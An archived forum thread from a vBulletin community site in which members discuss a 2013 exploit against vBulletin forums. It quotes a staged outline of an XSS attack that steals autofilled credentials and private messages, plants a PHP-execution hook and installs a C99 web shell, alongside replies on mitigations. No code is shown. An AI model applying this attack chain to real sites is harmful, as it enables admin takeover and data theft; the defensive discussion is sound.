Go Back   vb.org Archive > vBulletin 4 Discussion > vB4 General Discussions
Reload this Page Recent hacks - exploit discussion
FAQ Community Calendar Today's Posts Search

Reply
Page 1 of 2 1 2
 
Thread Tools Display Modes
  #1  
Old 11-18-2013, 05:17 PM
create365 create365 is offline
 
Join Date: Aug 2013
Posts: 15
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default Recent hacks - exploit discussion
http://www.reddit.com/r/netsec/comme...n_compromises/
I have the exploit code, researching it, also confirmed it works.
On black market, exploit is worth $7000.

Most of the times, it ends up with C99/PHPShell installed (mostly under Admin CP -> Paid Subscriptions -> Subscriptions Manager - because part of the users never look there.)

Have you secured your vBulletins/were you hacked?
How vBulletin plans to fix it?



Quote:
The XSS script is multistage based on what the user's session is currently capable of.
Create an invisible iframe pointing to the administrator control panel (ACP).
Using the iframe, check if the user is logged into the ACP. If yes, proceed to stage 5, otherwise continue to stage 3.
Since the user was not logged into the ACP, see if a password manager autofills the fields and submit the credentials off to an attacker controlled server. If no credentials were filled, continue to stage 4.
Retrieve all private messages of the user and ship them off to an attacker controlled servers since they might contain credentials or sensitive information. Not much to be done, exit the script.
Since the user was logged into the ACP, attempt to add a vBulletin hook that allows the remote execution of PHP code. If we don't have the permissions for this, continue to stage 6, otherwise exit the script.
Last straw attempt, try changing a higher ranked administrator's password. (yes, vBulletin is stupid enough to allow it) If we don't have the permissions for this either, continue to stage 4, otherwise exit the script.
Reply With Quote
  #2  
Old 11-18-2013, 05:27 PM
Zachery's Avatar
Zachery Zachery is offline
 
Join Date: Jul 2002
Location: Ontario, Canada
Posts: 11,440
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
So, you still have to some how gain access to a semi-privileged account, and then get an administrator to look at the post that has the malicious html in it?
Reply With Quote
  #3  
Old 11-18-2013, 05:31 PM
create365 create365 is offline
 
Join Date: Aug 2013
Posts: 15
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Nope. Attack can be done from any site, but administrator has to view it. No account on target forums needed. It's pretty easy to achieve.
If someone with less privileges enters the page, it does other stuff. As described above its multi-stage.
The site when viewing opens an invisible iframe and executes the exploit.
Then, if it manages to install the shell, entering specific url enables hacker to access server almost like via ssh. It allows to execute SQL queries, for example to add new administrator, or even truncate all tables.
Reply With Quote
  #4  
Old 11-18-2013, 05:50 PM
Zachery's Avatar
Zachery Zachery is offline
 
Join Date: Jul 2002
Location: Ontario, Canada
Posts: 11,440
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Still requires sending someone semi-privileged to view the malicious code, and that the user has access to do the things outlined.

I'd like to point out, you can restrict access to other admins changing other admins account via the config.php file, as well as locking down admin permisions via a super admin.
Reply With Quote
  #5  
Old 11-18-2013, 06:15 PM
Max Taxable's Avatar
Max Taxable Max Taxable is offline
 
Join Date: Feb 2011
Posts: 3,134
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Quote:
The XSS script is multistage based on what the user's session is currently capable of.
Seems like requiring the security token for this POST action stops this cold.
Reply With Quote
  #6  
Old 11-18-2013, 06:54 PM
create365 create365 is offline
 
Join Date: Aug 2013
Posts: 15
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Quote:
Originally Posted by Zachery View Post
Still requires sending someone semi-privileged to view the malicious code, and that the user has access to do the things outlined.
Well, that is the easiest part.
Reply With Quote
  #7  
Old 11-18-2013, 07:35 PM
TheLastSuperman's Avatar
TheLastSuperman TheLastSuperman is offline
Senior Member
  
Join Date: Sep 2008
Location: North Carolina
Posts: 5,844
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
I've ran into this before even was worried about it back in September remember that pm I sent you Zachery? It was related to this the exploit I thought was out there but could not confirm.

What they are doing is base64 encoding the plugins so hard to tell what exactly it's doing... it's always 3-4 plugins and 3/4 prompt virus alerts from your software (which c99 madshell does so if the shell script was not on the local server then zing you guessed it, they connected to it remotely via the plugin i.e. the anti-virus alert). Basically instead of now uploading c99madshell directly onto the server they are trying to exploit, they simply modified it and uploaded to their own server - after that the plugin connects to c99 madshell and they execute what they wish from their own server through your site via the plugins yet one more reason you don't see all what you wish you did in the logs while trying to figure out what just smacked you silly.
Reply With Quote
  #8  
Old 11-18-2013, 07:37 PM
Digital Jedi's Avatar
Digital Jedi Digital Jedi is offline
 
Join Date: Oct 2006
Location: PopCulturalReferenceLand
Posts: 5,171
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
So your admins should generally be undeletable/unalterable. It's a pain, but it helps.

$7000!?

Seems like all of this could have been avoided if you just used secure passwords.
Reply With Quote
  #9  
Old 11-18-2013, 07:59 PM
findingpeace's Avatar
findingpeace findingpeace is offline
 
Join Date: Nov 2011
Posts: 268
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
This page says the exploit uses HTML in Announcement Titles... Isn't that exactly what happened here on vBulletin.org?
Reply With Quote
  #10  
Old 11-18-2013, 08:07 PM
Digital Jedi's Avatar
Digital Jedi Digital Jedi is offline
 
Join Date: Oct 2006
Location: PopCulturalReferenceLand
Posts: 5,171
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
I don't see how, if the dev server attack was non-vBulletin related.
Reply With Quote
Reply
Page 1 of 2 1 2

« Previous Thread | Next Thread »

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump


All times are GMT. The time now is 11:11 AM.

Contact Us - Archive - Top

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.04312 seconds
  • Memory Usage 2,251KB
  • Queries Executed 11 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (3)bbcode_quote
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (1)pagenav_pagelink
  • (10)post_thanks_box
  • (10)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (10)post_thanks_postbit_info
  • (10)postbit
  • (10)postbit_onlinestatus
  • (10)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 
Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • pagenav_page
  • pagenav_complete
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete